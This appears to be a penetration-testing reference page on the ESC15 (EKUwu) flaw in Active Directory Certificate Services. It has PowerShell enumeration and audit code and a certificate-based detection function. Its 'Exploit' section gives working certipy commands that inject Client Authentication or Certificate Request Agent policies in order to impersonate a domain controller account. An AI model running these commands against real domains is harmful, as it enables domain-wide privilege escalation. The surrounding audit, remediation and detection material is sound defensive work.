# ESC15

* <https://trustedsec.com/blog/ekuwu-not-just-another-ad-cs-esc>

## Enumerate

Get the templates that are published (enabled) on every enrollment service (CA) in the forest:

```powershell
PS > $enabledTemplates = Get-ADObject -LDAPFilter "(&(objectClass=pKIEnrollmentService))" -SearchBase "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,$((Get-ADRootDSE).rootDomainNamingContext)" -Properties certificateTemplates | select -ExpandProperty certificateTemplates
```

Get the enabled v1 (schema version 1) templates that have `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT` (0x1) set in `msPKI-Certificate-Name-Flag`:

```powershell
PS > Get-ADObject -Filter 'objectClass -eq "pKICertificateTemplate"' -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,$((Get-ADRootDSE).rootDomainNamingContext)" -Property name,msPKI-Template-Schema-Version,msPKI-Certificate-Name-Flag | ? {$_.'msPKI-Template-Schema-Version' -eq 1 -and ($_.'msPKI-Certificate-Name-Flag' -band 0x00000001)} | ? {$enabledTemplates -contains $_.name}
```
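The two queries above can be folded into one audit function that also reports which principals hold Enroll rights on each affected template, which is what decides whether a low-privileged user can reach it. This is an added example, not code from the original page; `Get-Esc15Template` is this example's own name, it assumes the RSAT `ActiveDirectory` module and a domain-joined session, and it resolves Enroll rights through the `Certificate-Enrollment` extended right GUID (`0e10c968-78fb-11d1-ac7b-0000f80367c1`) or an all-zero ObjectType (all extended rights) on the template's security descriptor.

```powershell
function Get-Esc15Template {
    # Audits the forest for ESC15 exposure: v1 (schema version 1) templates that are published on a CA,
    # have CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT (0x1) set, and the principals that may enroll in them.
    # Assumes the RSAT ActiveDirectory module; function name and output shape are this example's own.
    Import-Module ActiveDirectory -ErrorAction Stop
    $pkiBase = "CN=Public Key Services,CN=Services,$((Get-ADRootDSE).configurationNamingContext)"

    # Step 1: map template name -> CAs (pKIEnrollmentService objects) that publish it
    $publishedOn = @{}
    Get-ADObject -LDAPFilter '(objectClass=pKIEnrollmentService)' `
        -SearchBase "CN=Enrollment Services,$pkiBase" -Properties certificateTemplates |
        ForEach-Object {
            $caName = $_.Name
            foreach ($t in @($_.certificateTemplates)) {
                if (-not $publishedOn.ContainsKey($t)) { $publishedOn[$t] = @() }
                $publishedOn[$t] += $caName
            }
        }

    # Certificate-Enrollment extended right; an all-zero ObjectType on an ExtendedRight ACE means "all extended rights"
    $enrollRight = [guid]'0e10c968-78fb-11d1-ac7b-0000f80367c1'
    $allRights   = [guid]::Empty

    # Step 2: v1 templates with the flag, restricted to those actually published, plus their enrollers
    Get-ADObject -LDAPFilter '(objectClass=pKICertificateTemplate)' `
        -SearchBase "CN=Certificate Templates,$pkiBase" `
        -Properties name, msPKI-Template-Schema-Version, msPKI-Certificate-Name-Flag, nTSecurityDescriptor |
        Where-Object {
            $_.'msPKI-Template-Schema-Version' -eq 1 -and
            ($_.'msPKI-Certificate-Name-Flag' -band 0x1) -and
            $publishedOn.ContainsKey($_.Name)
        } |
        ForEach-Object {
            $tpl = $_
            $enrollers = $tpl.nTSecurityDescriptor.Access |
                Where-Object {
                    $_.AccessControlType -eq 'Allow' -and
                    $_.ActiveDirectoryRights.HasFlag([System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight) -and
                    ($_.ObjectType -eq $enrollRight -or $_.ObjectType -eq $allRights)
                } |
                ForEach-Object { $_.IdentityReference.Value } | Sort-Object -Unique

            [pscustomobject]@{
                Template    = $tpl.Name
                PublishedOn = ($publishedOn[$tpl.Name] -join ', ')
                Enrollers   = ($enrollers -join ', ')   # review for broad groups such as Domain Users or Authenticated Users
            }
        }
}

Get-Esc15Template | Format-Table -AutoSize
```

A template listed here with a broad group in `Enrollers` is the condition both exploit paths below depend on; removing the enrollee-supplies-subject flag, unpublishing the template, or tightening its Enroll ACL closes that path for the template in question.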

## Exploit

### ESC15 → ESC1

Abusing **Client Authentication** (application policy OID `1.3.6.1.5.5.7.3.2`):

```bash
$ proxychains4 certipy req -u snovvcrash@megacorp.local -p 'Passw0rd!' -ca CorpCA -target CA01.megacorp.local -target-ip 192.168.1.12 -template VulnTemplate --application-policies '1.3.6.1.5.5.7.3.2' -upn 'DC01$@megacorp.local' -sid <DC01_SID> -ns 192.168.1.11 -dc-ip 192.168.1.11 -dns-tcp
```

### ESC15 → ESC3

Abusing **Certificate Request Agent** (application policy OID `1.3.6.1.4.1.311.20.2.1`), then enrolling on behalf of another principal with the resulting certificate:

```bash
$ proxychains4 certipy req -u snovvcrash@megacorp.local -p 'Passw0rd!' -ca CorpCA -target CA01.megacorp.local -target-ip 192.168.1.12 -template VulnTemplate --application-policies '1.3.6.1.4.1.311.20.2.1' -ns 192.168.1.11 -dc-ip 192.168.1.11 -dns-tcp
$ proxychains4 certipy req -u snovvcrash@megacorp.local -p 'Passw0rd!' -pfx snovvcrash.pfx -ca CorpCA -target CA01.megacorp.local -target-ip 192.168.1.12 -template User -on-behalf-of 'MEGACORP\DC01$' -ns 192.168.1.11 -dc-ip 192.168.1.11 -dns-tcp
```
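Both paths leave the same trace on the issued certificate: a v1 template (identified by the Certificate Template Name extension `1.3.6.1.4.1.311.20.2`, with no v2+ Certificate Template Information extension `1.3.6.1.4.1.311.21.7`) carrying an Application Policies extension (`1.3.6.1.4.1.311.21.10`) whose policy was supplied by the requester. The following detection check is an added example, not code from the original page or from certipy; `Test-Esc15Certificate` and the helper names are this example's own, the tiny DER reader only handles the structures the two Microsoft extensions use, and the list of authentication-capable policy OIDs goes beyond the two on the page (it also covers Smart Card Logon, PKINIT Client Authentication and Any Purpose).

```powershell
function Read-DerTlv {
    # Minimal DER reader: returns the tag, the content bytes and the offset of the next element.
    param([byte[]]$Bytes, [int]$Offset)
    $tag = $Bytes[$Offset]
    $pos = $Offset + 1
    $len = [int]$Bytes[$pos]; $pos++
    if ($len -band 0x80) {                                  # long-form length
        $n = $len -band 0x7F; $len = 0
        for ($i = 0; $i -lt $n; $i++) { $len = ($len -shl 8) -bor [int]$Bytes[$pos]; $pos++ }
    }
    $content = if ($len -gt 0) { [byte[]]($Bytes[$pos..($pos + $len - 1)]) } else { [byte[]]@() }
    [pscustomobject]@{ Tag = $tag; Content = $content; Next = $pos + $len }
}

function ConvertFrom-DerOid {
    # Decodes the content bytes of an OBJECT IDENTIFIER into dotted form.
    param([byte[]]$Content)
    $first = [int]$Content[0]
    $parts = @([math]::Floor($first / 40), $first % 40)
    $value = 0
    for ($i = 1; $i -lt $Content.Length; $i++) {
        $value = ($value * 128) + ($Content[$i] -band 0x7F)
        if (-not ($Content[$i] -band 0x80)) { $parts += $value; $value = 0 }   # last byte of this arc
    }
    $parts -join '.'
}

function Get-ApplicationPolicyOids {
    # Application Policies ::= SEQUENCE OF PolicyInformation { policyIdentifier OBJECT IDENTIFIER, ... }
    param([byte[]]$RawData)
    $oids  = @()
    $outer = Read-DerTlv -Bytes $RawData -Offset 0
    $pos   = 0
    while ($pos -lt $outer.Content.Length) {
        $policy = Read-DerTlv -Bytes $outer.Content -Offset $pos
        $oidTlv = Read-DerTlv -Bytes $policy.Content -Offset 0
        $oids  += ConvertFrom-DerOid -Content $oidTlv.Content
        $pos    = $policy.Next
    }
    $oids
}

function Test-Esc15Certificate {
    # Flags a certificate issued from a v1 template that carries an Application Policies extension
    # granting an authentication-capable policy (the EKUwu/ESC15 pattern). Example code, own names.
    param([Parameter(Mandatory)][string]$Path)

    $authPolicies = @{                                      # well-known EKU / application policy OIDs
        '1.3.6.1.5.5.7.3.2'      = 'Client Authentication'
        '1.3.6.1.4.1.311.20.2.1' = 'Certificate Request Agent'
        '1.3.6.1.4.1.311.20.2.2' = 'Smart Card Logon'
        '1.3.6.1.5.2.3.4'        = 'PKINIT Client Authentication'
        '2.5.29.37.0'            = 'Any Purpose'
    }

    $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2 -ArgumentList $Path
    $ext  = @{}
    foreach ($e in $cert.Extensions) { $ext[$e.Oid.Value] = $e.RawData }

    $templateName = $null
    if ($ext.ContainsKey('1.3.6.1.4.1.311.20.2')) {         # v1 Certificate Template Name (BMPString)
        $tlv = Read-DerTlv -Bytes $ext['1.3.6.1.4.1.311.20.2'] -Offset 0
        $templateName = [System.Text.Encoding]::BigEndianUnicode.GetString($tlv.Content)
    }
    $isV1 = [bool]($templateName -and -not $ext.ContainsKey('1.3.6.1.4.1.311.21.7'))   # no v2+ template info

    $policies = @()
    if ($ext.ContainsKey('1.3.6.1.4.1.311.21.10')) {        # Application Policies
        $policies = Get-ApplicationPolicyOids -RawData $ext['1.3.6.1.4.1.311.21.10']
    }
    $hits = @($policies | Where-Object { $authPolicies.ContainsKey($_) } | ForEach-Object { $authPolicies[$_] })
    $suspicious = $isV1 -and ($hits.Count -gt 0)
    $reason = ''
    if ($suspicious) { $reason = "v1 template with requester-supplied Application Policies: $($hits -join ', ')" }

    [pscustomobject]@{
        Subject             = $cert.Subject
        Template            = $templateName
        IsV1Template        = $isV1
        ApplicationPolicies = ($policies -join ', ')
        Suspicious          = [bool]$suspicious
        Reason              = $reason
    }
}

Test-Esc15Certificate -Path .\issued.cer
```

Run it over certificates exported from the CA database or collected from endpoints; a v1 template normally produces no Application Policies extension at all, so any hit with `Suspicious = True` deserves a look at the CA request log for the matching request ID and requester.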
